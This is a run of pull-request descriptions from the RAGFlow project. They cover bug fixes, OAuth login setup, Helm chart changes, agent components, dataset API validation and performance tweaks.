- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: tangyu <1@1.com>
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Feat: Modify the Python language template code of the code operator
#4977
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
More fallbacks for bad citation format
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Refactoring
### What problem does this PR solve?
Fixed uncaptured figure data with position information. #7466, #7681
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Try our best to automatically repair corrupted PDF files on upload.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Updated the dialog settings function to add a default prompt
configuration for no dataset.
- The prompt configuration will be determined based on the presence of
`kb_ids` in the request.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (Non-breaking change, adding functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
---------
Co-authored-by: wenju.li <wenju.li@deepctr.cn>
### What problem does this PR solve?
## Cause of the bug:
During execution, because the trio CapacityLimiter was used improperly,
the configuration parameter MAX_CONCURRENT_TASKS had no effect, causing
the executor to take a large number of tasks from the Redis queue at one
time.
As a result, when a large number of tasks exist at the same time, the
task executor occupies too much memory and is killed by the OS, and all
executing tasks are suspended.
## Fix:
Added the task_manager method to the entry of /rag/svr/task_executor.py
to make CapacityLimiter effective. Deleted the invalid async with
statement.
## Fix result:
After testing, the task executor execution meets expectations, that is:
concurrent execution of up to $MAX_CONCURRENT_TASKS tasks.
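The idea of taking a slot before pulling work off the queue can be sketched as below. This is not the code from `task_executor.py`: it swaps trio's CapacityLimiter for `asyncio.Semaphore` from the standard library so the example is self-contained, uses a plain list in place of the Redis queue, and the limit of 3 is an illustrative value.

```python
import asyncio

MAX_CONCURRENT_TASKS = 3  # illustrative value, not the project's default


async def handle_task(task_id: int, stats: dict) -> None:
    """Stand-in for real work; records how many tasks run at once."""
    stats["running"] += 1
    stats["peak"] = max(stats["peak"], stats["running"])
    await asyncio.sleep(0.01)
    stats["running"] -= 1


async def run_all(task_ids: list, limit: int) -> dict:
    limiter = asyncio.Semaphore(limit)
    stats = {"running": 0, "peak": 0}
    pending = list(task_ids)  # stand-in for the Redis queue
    workers = []

    async def guarded(task_id: int) -> None:
        try:
            await handle_task(task_id, stats)
        finally:
            limiter.release()  # free the slot once the task ends

    while pending:
        # Take a slot first; only then pull the next task off the queue.
        await limiter.acquire()
        workers.append(asyncio.create_task(guarded(pending.pop(0))))

    await asyncio.gather(*workers)
    return stats


stats = asyncio.run(run_all(list(range(10)), MAX_CONCURRENT_TASKS))
print(stats["peak"] <= MAX_CONCURRENT_TASKS)
```

Because a task is only dequeued after a slot has been acquired, the number of tasks held in memory stays bounded by the limit instead of by the queue length.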
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Hello, when I input a very long line in the chat input box, it fails
with the following error:
```
2025-05-17 16:11:26,004 ERROR 182558 value too long for type character varying(255)
Traceback (most recent call last):
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 3291, in execute_sql
cursor.execute(sql, params or ())
psycopg2.errors.StringDataRightTruncation: value too long for type character varying(255)
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/var/home/sfc/Projects/ragflow/api/apps/conversation_app.py", line 68, in set_conversation
ConversationService.save(**conv)
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 3128, in inner
return fn(*args, **kwargs)
File "/var/home/sfc/Projects/ragflow/api/db/services/common_service.py", line 145, in save
return cls.save_n(**kwargs)
File "/var/home/sfc/Projects/ragflow/api/db/services/common_service.py", line 139, in save_n
sample_obj = cls.model(**kwargs).save(force_insert=True)
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 6923, in save
pk = self.insert(**field_dict).execute()
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 2011, in inner
return method(self, database, *args, **kwargs)
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 2082, in execute
return self._execute(database)
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 2887, in _execute
return super(Insert, self)._execute(database)
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 2598, in _execute
cursor = self.execute_returning(database)
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 2605, in execute_returning
cursor = database.execute(self)
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 3299, in execute
return self.execute_sql(sql, params)
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 3289, in execute_sql
with __exception_wrapper__:
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 3059, in __exit__
reraise(new_type, new_type(exc_value, *exc_args), traceback)
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 192, in reraise
raise value.with_traceback(tb)
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 3291, in execute_sql
cursor.execute(sql, params or ())
peewee.DataError: value too long for type character varying(255)
```
This PR fixes it by truncating the `name` field in the `set_conversation`
method in `conversation_app.py`.
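A minimal sketch of such a truncation, assuming the limit is the 255 characters reported in the error; the helper name `truncate_name` is hypothetical and not taken from the PR.

```python
MAX_NAME_LENGTH = 255  # matches the character varying(255) limit in the error


def truncate_name(name: str, limit: int = MAX_NAME_LENGTH) -> str:
    """Cut the name so it fits the column; shorter names pass through."""
    return name[:limit]


conv = {"name": "x" * 1000}
conv["name"] = truncate_name(conv["name"])
print(len(conv["name"]))  # 255
```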
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Feat: Rendering recall test page #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed the issue where message references could not be displayed
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Hello, our use case requires LLM agent to invoke some tools, so I made a
simple implementation here.
This PR does two things:
1. A simple plugin mechanism based on `pluginlib`:
This mechanism lives in the `plugin` directory. It will only load
plugins from `plugin/embedded_plugins` for now.
A sample plugin `bad_calculator.py` is placed in
`plugin/embedded_plugins/llm_tools`. It accepts two numbers `a` and `b`,
then gives a wrong result `a + b + 100`.
In the future, it can load plugins from external locations with little
code change.
Plugins are divided into different types. The only plugin type supported
in this PR is `llm_tools`, which must implement the `LLMToolPlugin`
class in the `plugin/llm_tool_plugin.py`.
More plugin types can be added in the future.
2. A tool selector in the `Generate` component:
Added a tool selector to select one or more tools for LLM:

With the `bad_calculator` tool, the `qwen-max` model produces this
result:

### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
Co-authored-by: Yingfeng <yingfeng.zhang@gmail.com>
### What problem does this PR solve?
Improve oauth configuration documentation and examples.
- Related pull requests:
- #7379
- #7553
- #7587
- Related issues:
- #3495
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Fix: Fixed the issue where the height of the chat page shared externally
did not fill the window #7460
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Launch sandbox from docker-compose.
#4977
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
---------
Co-authored-by: writinwaters <93570324+writinwaters@users.noreply.github.com>
### What problem does this PR solve?
Close #7655
Based on the code in api_app, I think the reference is one-to-one
with the message:
```python
def fillin_conv(ans):
    nonlocal conv, message_id
    if not conv.reference:
        conv.reference.append(ans["reference"])
    else:
        conv.reference[-1] = ans["reference"]
    conv.message[-1] = {"role": "assistant", "content": ans["answer"], "id": message_id}
    ans["id"] = message_id
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add code agent component.
#4977
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR introduces Pydantic-based validation for the delete dataset HTTP
API, improving code clarity and robustness. Key changes include:
1. Pydantic Validation
2. Error Handling
3. Test Updates
4. Documentation Updates
### Type of change
- [x] Documentation Update
- [x] Refactoring
### What problem does this PR solve?
Feat: Fixed the issue where the dataset configuration page kept
refreshing #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Use DOMPurify to filter out dangerous HTML #7668
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add the JS code (or other) executor component to Agent. #4977
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Deprecate `/github_callback` route in favor of
`/oauth/callback/<channel>` for GitHub OAuth integration:
- Added GitHub OAuth support in the authentication module
- Introduced `GithubOAuthClient` with methods to fetch and normalize
user info
- Updated `CLIENT_TYPES` to include GitHub OAuth client
- Deprecated `/github_callback` route and suggested using the generic
`/oauth/callback/<channel>` route
---
- Related pull requests:
- #7379
- #7553
### Usage
- [Create a GitHub OAuth
App](https://github.com/settings/applications/new) to obtain the
`client_id` and `client_secret`, configure the authorization callback
url: `https://your-app.com/v1/user/oauth/callback/github`
- Edit `service_conf.yaml.template`:
```yaml
# ...
oauth:
github:
type: "github"
icon: "github"
display_name: "Github"
client_id: "your_client_id"
client_secret: "your_client_secret"
redirect_uri: "https://your-app.com/v1/user/oauth/callback/github"
# ...
```
### Type of change
- [x] Documentation Update
- [x] Refactoring (non-breaking change)
TOML-table-based project.license is deprecated as per PEP 639, see:
https://packaging.python.org/en/latest/guides/writing-pyproject-toml/#license-and-license-files
### What problem does this PR solve?
The following deprecation warning is emitted when building the project (e.g. `uv build`):
```
SetuptoolsDeprecationWarning: `project.license` as a TOML table is deprecated
!!
********************************************************************************
Please use a simple string containing a SPDX expression for `project.license`. You can also use `project.license-files`. (Both options available on setuptools>=77.0.0).
By 2026-Feb-18, you need to update your project and remove deprecated calls
or your builds will no longer be supported.
See https://packaging.python.org/en/latest/guides/writing-pyproject-toml/#license for details.
********************************************************************************
!!
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
For `uv package`/`uv pip install ".[full]"`, bug introduced in #6370:
* Removes erroneous (non-package) directories (`helm`, `flask_session`)
* Adds `mcp.server` package
* Resolves "warning: package would be ignored" ambiguity by changing
`sdk` to `sdk.python.ragflow_sdk`
* Resolves "error: package directory 'intergrations' does not exist" by
including `intergrations.chatgpt-on-wechat.plugins` explicitly
* Also rearranges packages in alphabetical order, for DX.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Deleting a chunk now also deletes the image related to that chunk.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [x] Other (please describe): llm factories update
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Feat: Add data set configuration form #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Display inline (non-quoted) images in the chat and search modules
#7623
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Update 7 README files.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Add libjemalloc installation command. If the operating system does not
have the libjemalloc library, the execution of entrypoint.sh and
launch_backend_service.sh will be interrupted, and the
rag/svr/task_executor.py script will not be started normally.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Add frontend support for third-party login integration:
- Used `getLoginChannels` API to fetch available login channels from the
server
- Used `loginWithChannel` function to initiate login based on the
selected channel
- Refactored `useLoginWithGithub` hook to `useOAuthCallback` for
generalized OAuth callback handling
- Updated the login page to dynamically render third-party login buttons
based on the fetched channel list
- Styled third-party login buttons to improve user experience
- Removed unused code snippets
> This PR removes the previously hardcoded GitHub login button. Since
the functionality only worked when `location.host` was equal to
`demo.ragflow.io`, and the authentication logic is now based on
`login.ragflow.io`, this change does not affect the existing logic and
is considered a non-breaking change
---
#### Frontend Screenshot && Backend Configuration

```yaml
# docker/service_conf.yaml.template
# ...
oauth:
github:
icon: github
display_name: "Github"
# ...
custom_channel:
display_name: "OIDC"
# ...
custom_channel_2:
display_name: "OAuth2"
# ...
```
---
- Related pull requests:
- #7379
- #7521
- Related issues:
- #3495
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- [x] Refactoring
- [x] Performance Improvement
### What problem does this PR solve?
Feat: Show images in reply messages #7608
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Fixed the issue where the chat page would jump after entering the
homepage #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Adjust the display position of recall test item images #7608
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Whether to apply graph resolution and community extraction is stored in
`task["kb_parser_config"]`. However, the previous code read
`graphrag_conf` from `task["parser_config"]`, so `with_resolution`
and `with_community` were always false.
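The effect of reading from the wrong dictionary can be illustrated with a small sketch. The nested key names `graphrag`, `resolution` and `community` and the helper `graphrag_flags` are assumptions made for the example; only `kb_parser_config` and `parser_config` come from the description.

```python
def graphrag_flags(task: dict) -> tuple:
    """Return (with_resolution, with_community) from the KB-level config."""
    # Hypothetical key names: "graphrag", "resolution", "community".
    conf = task.get("kb_parser_config", {}).get("graphrag", {})
    return bool(conf.get("resolution", False)), bool(conf.get("community", False))


task = {
    "parser_config": {},  # document-level config without graph settings
    "kb_parser_config": {"graphrag": {"resolution": True, "community": True}},
}

# Reading from the wrong dict silently falls back to the defaults.
wrong_conf = task["parser_config"].get("graphrag", {})
print(wrong_conf.get("resolution", False))  # False
print(graphrag_flags(task))                 # (True, True)
```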
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Feat: Add FormContainer component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix HTTP API Create/Update dataset parser config default value error
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Adds support for the GPT-4.1 series from OpenAI.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Hello, we are using ragflow as a backend service, so we need to manage
agents from our own frontend. This PR adds HTTP APIs to manage
agents.
The code logic is copied and modified from the `rm` and `save` methods
in `api/apps/canvas_app.py`.
btw, I found that the `save` method in `canvas_app.py` actually allows
renaming an agent to a title that already exists, so I kept that behavior
in the HTTP API. I'm not sure if this is intentional.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Since `import markdown.markdown` has been changed to `import markdown`
in `rag/app/naive.py`, previous code for converting markdown tables
would call the markdown module instead of a callable function. This
caused an error.
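The failure mode is the generic "module object is not callable" error. The sketch below reproduces it with the standard-library `textwrap` module as a stand-in for the `markdown` package, so it runs without extra dependencies; it is an analogy, not the code in `rag/app/naive.py`.

```python
import textwrap  # stdlib stand-in for the `markdown` package

error = None
try:
    textwrap("  hello")  # calling the module itself, as the old code did
except TypeError as exc:
    error = str(exc)

# The fix is to call the function through the module namespace.
result = textwrap.dedent("  hello")
print(error)
print(result)
```

With `import markdown`, the equivalent fix is to call `markdown.markdown(...)` rather than `markdown(...)`.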
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
Modified the chart to retain persistent volumes by default when the
chart is uninstalled, following established best practices in the Helm
community (e.g., Bitnami charts)
### What problem does this PR solve?
Previously, deleting the helm chart would automatically remove all
persistent data, which poses a risk of accidental data loss.
### Rationale
This change aligns with industry standards to safeguard data by
requiring explicit action to remove persistence, rather than making
deletion the default behavior.
### Impact:
Users who intentionally want to remove persistent data will need to do
so manually or by setting appropriate flags during chart uninstallation.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
As RAGFlow has an integration with Langfuse, this docs page shows how to
configure Langfuse tracing.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
This PR introduces Pydantic-based validation for the update dataset HTTP
API, improving code clarity and robustness. Key changes include:
1. Pydantic Validation
2. Error Handling
3. Test Updates
4. Documentation Updates
5. fix bug: #5915
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Documentation Update
- [x] Refactoring
### What problem does this PR solve?
Fixes bug & regression introduced by [PR #7187 - refactor: Update Redis
configuration to use StatefulSet instead of deployment with
pvc](https://github.com/infiniflow/ragflow/pull/7187):
1. Fixes bug #7403 - `redis.persistence.enabled` missing from
`helm/values.yaml` causes helm error:
[ERROR] templates/: template: ragflow/templates/redis.yaml:55:24:
executing "ragflow/templates/redis.yaml" at
<.Values.redis.persistence.enabled>: nil pointer evaluating interface
{}.enabled
2. Fixes regression: reverts hardcoded redis.storage.capacity value back
to using variable `redis.storage.capacity` from `helm/values.yaml`.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
1. The MySQL instance is configured with max_connections=1000,
but our connection pool was limited to max_connections: 100.
This mismatch caused connection pool exhaustion during performance
testing.
2. Increase stale_timeout to resolve #6548
### Type of change
- [x] Performance Improvement
### What problem does this PR solve?
Feat: Cross-language query #7376 #4503 #5710 #7470
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
KB detail now returns the total document size.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add scheduled workflow for daily HTTP API full tests
Configure cron job to trigger at 16:00:00Z (00:00:00+08:00)
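The two timestamps refer to the same instant, which can be checked with a short conversion. The calendar date used here is arbitrary and only serves the example.

```python
from datetime import datetime, timedelta, timezone

# 16:00 UTC on an arbitrary date.
utc_trigger = datetime(2025, 1, 1, 16, 0, 0, tzinfo=timezone.utc)

# The same instant expressed in UTC+08:00.
local_trigger = utc_trigger.astimezone(timezone(timedelta(hours=8)))

print(local_trigger.isoformat())  # 2025-01-02T00:00:00+08:00
```

So a daily schedule evaluated in UTC at 16:00 fires at midnight in UTC+08:00, at the start of the following local day.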
### Type of change
- [X] CI update
### What problem does this PR solve?
Feat: Replace the submit form button with ButtonLoading #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Two cases arise when the local ES tag search returns results that are then filtered out by score:
1. The doc is left with empty tags and the LLM is not visited.
2. The code may use empty examples in the prompt for the LLM tag search.
Co-authored-by: huangfuqunze <huangfuqunze.hfqz@alibaba-inc.com>
### What problem does this PR solve?
The parameter positions were incorrect and have been corrected to use
keyword argument passing
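The class of bug can be illustrated with a hypothetical function. The name `retrieve` and its parameters are invented for this sketch and are not the function touched by the PR.

```python
def retrieve(question: str, top_k: int = 5, similarity_threshold: float = 0.2) -> dict:
    """Hypothetical function with two optional numeric parameters."""
    return {
        "question": question,
        "top_k": top_k,
        "similarity_threshold": similarity_threshold,
    }


# Positional call with the last two arguments in the wrong order:
# Python accepts it, but each value lands in the other parameter.
wrong = retrieve("what is RAG?", 0.3, 10)

# Keyword arguments bind by name, so the order no longer matters.
right = retrieve("what is RAG?", similarity_threshold=0.3, top_k=10)

print(wrong["top_k"], right["top_k"])  # 0.3 10
```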
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Adjust the operation cell of the table on the file management page
and dataset page #3221.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: the deepseek-ai/deepseek-vl2 model could not be selected as a VL
model to parse PDF images. Also add other VL model configs from SiliconFlow.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
---------
Co-authored-by: unknown <taoshi.ln@chinatelecom.cn>
### What problem does this PR solve?
Add `/login/channels` route and improve auth logic to support frontend
integration with third-party login providers:
- Add `/login/channels` route to provide authentication channel list
with `display_name` and `icon`
- Optimize user info parsing logic by prioritizing `avatar_url` and
falling back to `picture`
- Simplify OIDC token validation by removing unnecessary `kid` checks
- Ensure `client_id` is safely cast to string during `audience`
validation
- Fix typo
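Two of the points above, the avatar fallback and the string cast during `audience` validation, can be sketched as follows. The function names and the `email` field are hypothetical; only `avatar_url`, `picture`, `client_id` and `audience` come from the description.

```python
def normalize_user_info(raw: dict) -> dict:
    """Prefer `avatar_url`; fall back to `picture` when it is missing or empty."""
    return {
        "email": raw.get("email"),  # hypothetical extra field
        "avatar_url": raw.get("avatar_url") or raw.get("picture"),
    }


def audience_matches(client_id, aud) -> bool:
    """The `aud` claim may be a single string or a list of strings."""
    expected = str(client_id)  # cast so a numeric client_id still compares
    audiences = aud if isinstance(aud, (list, tuple)) else [aud]
    return expected in (str(a) for a in audiences)


print(normalize_user_info({"picture": "https://example.com/p.png"})["avatar_url"])
print(audience_matches(12345, ["12345", "other"]))
```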
---
- Related pull request: #7379
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
Fix: When the knowledge bases of multiple tenants are shared with one
person and that person queries the knowledge bases of both tenants, only
the first tenant's knowledge base is queried.
Co-authored-by: 杜有强 <duyq@internal.ths.com.cn>
### What problem does this PR solve?
1. Add delete_by_ids method
2. Add get_doc_ids_by_doc_names
3. Improve user_canvan_version's logic (avoid O(n) db IO)
4. Improve document delete logic (avoid O(n) db IO)
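The difference between one round trip per row and a single batched statement can be sketched with the standard-library `sqlite3` module. This swaps in sqlite3 for the project's own database layer, and the table layout is invented for the example; only the name `delete_by_ids` comes from the description.

```python
import sqlite3


def delete_by_ids(conn: sqlite3.Connection, table: str, ids: list) -> int:
    """Delete all rows whose id is in `ids` with a single statement."""
    if not ids:
        return 0
    placeholders = ",".join("?" for _ in ids)
    # `table` is interpolated directly, so it must come from trusted code.
    cur = conn.execute(f"DELETE FROM {table} WHERE id IN ({placeholders})", ids)
    conn.commit()
    return cur.rowcount


conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE document (id TEXT PRIMARY KEY, name TEXT)")
conn.executemany(
    "INSERT INTO document VALUES (?, ?)",
    [(str(i), f"doc{i}") for i in range(5)],
)

deleted = delete_by_ids(conn, "document", ["0", "2", "4"])
remaining = [row[0] for row in conn.execute("SELECT id FROM document ORDER BY id")]
print(deleted, remaining)  # 3 ['1', '3']
```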
### Type of change
- [x] Performance Improvement
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
---------
Co-authored-by: 马继龙 <majilong@ideal.com>
### What problem does this PR solve?
Fix: After deleting the file from the file management menu, it was not
removed from the MinIO bucket.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
Co-authored-by: liuzhenghua-jk <liuzhenghua-jk@360shuke.com>
### What problem does this PR solve?
This is a follow-up of #7088 , adding a knowledge base type input to the
`Begin` component, and a knowledge base selector to the agent flow debug
input panel:

then you can select one or more knowledge bases when testing the agent:

Note: the lines changed in `agent/component/retrieval.py` after line 94
are modified by `ruff format` from the `pre-commit` hooks, no functional
change.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/7466
I think this happens because sometimes we cannot get the position.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
When parsing documents containing images, the current code uses a
single-threaded approach to call the VL model, resulting in extremely
slow parsing speed (e.g., parsing a Word document with dozens of images
takes over 20 minutes).
By switching to a multithreaded approach to call the VL model, the
parsing speed can be improved to an acceptable level.
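A minimal sketch of the multithreaded approach, assuming each VL-model call is a blocking request. `describe_image` is a hypothetical stand-in that only sleeps, and the worker count of 8 is an illustrative value.

```python
import time
from concurrent.futures import ThreadPoolExecutor


def describe_image(image_id: int) -> str:
    """Hypothetical stand-in for one blocking VL-model request."""
    time.sleep(0.05)
    return f"description of image {image_id}"


def describe_all(image_ids: list, max_workers: int = 8) -> list:
    """Run the blocking calls on a thread pool; results keep input order."""
    with ThreadPoolExecutor(max_workers=max_workers) as pool:
        return list(pool.map(describe_image, image_ids))


descriptions = describe_all(list(range(20)))
print(len(descriptions))  # 20
```

Threads help here because the time is spent waiting on the model's response rather than on local computation.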
### Type of change
- [x] Performance Improvement
---------
Co-authored-by: liuzhenghua-jk <liuzhenghua-jk@360shuke.com>
### What problem does this PR solve?
Fixed an error when variables declared in begin have a key containing "begin".
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix https://github.com/infiniflow/ragflow/issues/7224 and
https://github.com/infiniflow/ragflow/issues/6793
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
Fix instructions for Ollama
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
1. Use `host.docker.internal` as base URL
2. Fix numbers in list
3. Make clear what is the console input and what is the output
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Fix: `filed_map` was incorrectly persisted. #7412
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Modify the style of the dataset page #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Change the default value of the create dataset delimiter to r'\n'.
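For readers unfamiliar with the raw-string notation: `r'\n'` is the two-character sequence backslash plus `n`, not a line feed. The sketch below only shows that difference in plain Python; how the stored delimiter is interpreted later in the pipeline is not covered here.

```python
import re

literal = r"\n"  # two characters: a backslash followed by "n"
newline = "\n"   # one character: a line feed

text = "first\nsecond"

# As a plain substring, the raw form does not occur in the text.
plain_split = text.split(literal)

# As a regular expression pattern, the raw form matches a line feed.
regex_split = re.split(literal, text)

print(len(literal), len(newline))  # 2 1
print(plain_split, regex_split)
```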
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Modify the dataset list page style #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix #6600
Hello, I have the same business requirement as #6600. My use case is:
